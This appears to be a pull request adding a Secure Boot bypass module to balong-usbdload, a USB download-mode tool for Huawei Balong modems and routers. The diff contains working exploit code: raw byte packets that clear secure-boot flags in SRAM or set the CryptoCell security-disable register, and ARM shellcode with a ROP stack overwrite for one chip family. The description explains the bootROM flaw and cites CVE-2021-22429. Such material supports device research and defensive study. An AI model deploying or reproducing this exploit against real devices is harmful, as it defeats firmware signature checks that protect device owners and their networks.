### PR TITLE
Secuboot bypass (-x), for Balong V7R1, V7R2/V7R11, V7R22, V7R5, V7R65 and 5000

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -16,7 +16,7 @@ clean:
 #.c.o:
 #	$(CC) -o $@ $(LIBS) $^ qcio.o
 
-balong-usbdload: balong-usbdload.o parts.o patcher.o
+balong-usbdload: balong-usbdload.o parts.o patcher.o exploit.o
 	@gcc $^ -o $@ $(LIBS)
 
 ptable-injector: ptable-injector.o parts.o

--- a/exploit.c
+++ b/exploit.c
@@ -1,0 +1,132 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include "exploit.h"
+
+struct exploit_cmd {
+    unsigned char *cmd;
+    unsigned int size;
+};
+
+static void secuboot_exploit(struct exploit_cmd *exploitcmd, unsigned int size)
+{
+    unsigned int res;
+    unsigned char secuboot_buf[32];
+
+    for (int cnt = 0; cnt < size; cnt++) {
+        if (exploitcmd[cnt].size > 32) {
+            printf("\n[Secuboot] Слишком большой размер команды!\n");
+            return;
+        }
+        memcpy(secuboot_buf, exploitcmd[cnt].cmd, exploitcmd[cnt].size);
+        res=sendcmd(secuboot_buf, exploitcmd[cnt].size);
+        if (!res) {
+            printf("\n[Secuboot] Модем отверг пакет [%d]\n", cnt);
+            return;
+        }
+    }
+}
+
+/*
+ * Balong V7R1 (Hi6920)
+ * Huawei E3272, E3276, E5372
+ */
+void secuboot_exploit_v7r1()
+{
+    struct exploit_cmd exploitcmd[] = {
+        /* 0x2FFFFFEC, address of structure in SRAM with secuboot and root ca flag */
+        {"\xFE\x00\xFF\x01\x00\x00\x00\x08\x2F\xFF\xFF\xEC\x00\x00", 14},
+        /* 8 byte of zeros */
+        {"\xDA\x01\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x92\x24", 13}
+    };
+    secuboot_exploit(exploitcmd, 2);
+}
+
+/*
+ * Balong V7R2 (Hi6930)
+ * Huawei E3372s, E5373, E5377, E5786
+ *
+ * Balong V7R11 (V711, Hi6921)
+ * Huawei E3372h, E8372h, E5573, E5576, B310, B315s
+ */
+void secuboot_exploit_v7r11()
+{
+    struct exploit_cmd exploitcmd[] = {
+        /* 0x4FE1FFEC, address of structure in SRAM with secuboot and root ca flag */
+        {"\xFE\x00\xFF\x01\x00\x00\x00\x08\x4F\xE1\xFF\xEC\xA8\xA3", 14},
+        /* 8 byte of zeros */
+        {"\xDA\x01\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x92\x24", 13}
+    };
+    secuboot_exploit(exploitcmd, 2);
+}
+
+/*
+ * Balong V7R5 (Hi6950)
+ * Huawei B612s, B618s, B715s
+ */
+void secuboot_exploit_v7r5()
+{
+    struct exploit_cmd exploitcmd[] = {
+        /* 0x1001FFEC, address of structure in SRAM with secuboot and root ca flag */
+        {"\xFE\x00\xFF\x01\x00\x00\x00\x08\x10\x01\xFF\xEC\x00\x00", 14},
+        /* 8 byte of zeros */
+        {"\xDA\x01\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x92\x24", 13}
+    };
+    secuboot_exploit(exploitcmd, 2);
+}
+
+/*
+ * Balong V7R22 (V722, Hi6932)
+ * Huawei E5785, E5885, B316, B525, B528, B535
+ */
+void secuboot_exploit_v7r22()
+{
+    struct exploit_cmd exploitcmd[] = {
+        /* Cryptocell HOST_CPC_SECURITY_DISABLE: 0x90004000 + 0xAD8 */
+        {"\xFE\x00\xFF\x01\x00\x00\x00\x04\x90\x00\x4A\xD8\x00\x00", 14},
+        /* 1 to disable validation */
+        {"\xDA\x01\xFE\x01\x00\x00\x00\x00\x00", 9}
+    };
+    secuboot_exploit(exploitcmd, 2);
+}
+
+/*
+ * Balong V7R65 (V7650, Hi6965)
+ * Huawei B625, B818
+ *
+ * This SoC does not have HOST_CPC_SECURITY_DISABLE in Cryptocell.
+ * The shellcode jumps to A core code load function, bypassing validation.
+ */
+void secuboot_exploit_v7r65(unsigned int jumpaddr)
+{
+    unsigned char shellcode[] = "\xDA\x01\xFE\x01\x48\x02\x4b\x18\x47\x00\xbf\x00\x00\x10\x1c\x85\x04\x08\x00\x00\x00";
+    struct exploit_cmd exploitcmd[] = {
+        /* First "address" command (to 0x00, for shellcode load) */
+        {"\xFE\x00\xFF\x01\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00", 14},
+        /* Shellcode to jump to usbloader */
+        {shellcode, 21},
+        /* Second "address" command (for ROP in 0x5cb14 on stack) */
+        {"\xFE\x00\xFF\x01\x00\x00\x00\x04\x00\x05\xCB\x14\x00\x00", 14},
+        /* ROP data (0x00 address in thumb mode = 0x01) */
+        {"\xDA\x01\xFE\x01\x00\x00\x00\x00\x00", 9}
+    };
+    /* Rewrite jump address in shellcode */
+    *(uint32_t*)(shellcode + 11) = jumpaddr;
+    secuboot_exploit(exploitcmd, 4);
+}
+
+/*
+ * Balong 5000 (Hi9500)
+ * Huawei H112, H122, E6878
+ */
+void secuboot_exploit_5000()
+{
+    struct exploit_cmd exploitcmd[] = {
+        /* Cryptocell HOST_CPC_SECURITY_DISABLE: 0xC4006000 + 0xFD8 */
+        {"\xFE\x00\xFF\x01\x00\x00\x00\x04\xC4\x00\x6F\xD8\x00\x00", 14},
+        /* 1 to disable validation */
+        {"\xDA\x01\xFE\x01\x00\x00\x00\x00\x00", 9}
+    };
+    secuboot_exploit(exploitcmd, 2);
+}

--- a/exploit.h
+++ b/exploit.h
@@ -1,0 +1,7 @@
+void secuboot_exploit_v7r1();
+void secuboot_exploit_v7r11();
+void secuboot_exploit_v7r22();
+void secuboot_exploit_v7r5();
+void secuboot_exploit_v7r65(unsigned int jumpaddr);
+void secuboot_exploit_5000();
+int sendcmd(unsigned char* cmdbuf, int len);


### PR DESCRIPTION
Huawei Balong BootROM USB download mode does not have address validation and allows writing to any memory region, including stack and memory-mapped devices, even with Secure Boot ("secuboot") mode enabled.

On Balong V7R1, V7R2, V7R5, and V7R11, this set of exploits clear "rootca" and "secuboot_enabled" variables on stack which are initialized on boot. Balong V7R22 and 5000 use ARM CryptoCell IP for validation, which has a special CPC_SECURITY_DISABLE register to bypass validation during current boot. Exploit activates it. Balong V7R65 also uses CryptoCell but apparently does not have this register. It is exploited with a small shellcode which boots second usbloader partition directly.

It is unknown when this bug was first discovered, but as far as I know it was first commercially implemented in SigmaKey for smartphone HiSilicon chips circa May 2019. Circa December 2019 it was found by my friends and me, and implemented for Balong V7R11, later for other chips. In summer 2021 two independent researchers have presented their findings on this issue:
 * @hhj4ck with checkm30 https://github.com/hhj4ck/checkm30 presented on MOSEC 2021
 * TASZK Security Labs SL with CVE-2021-22429: Huawei Buffer Overflow in BootROM USB Stack, presented on BlackHat USA 2021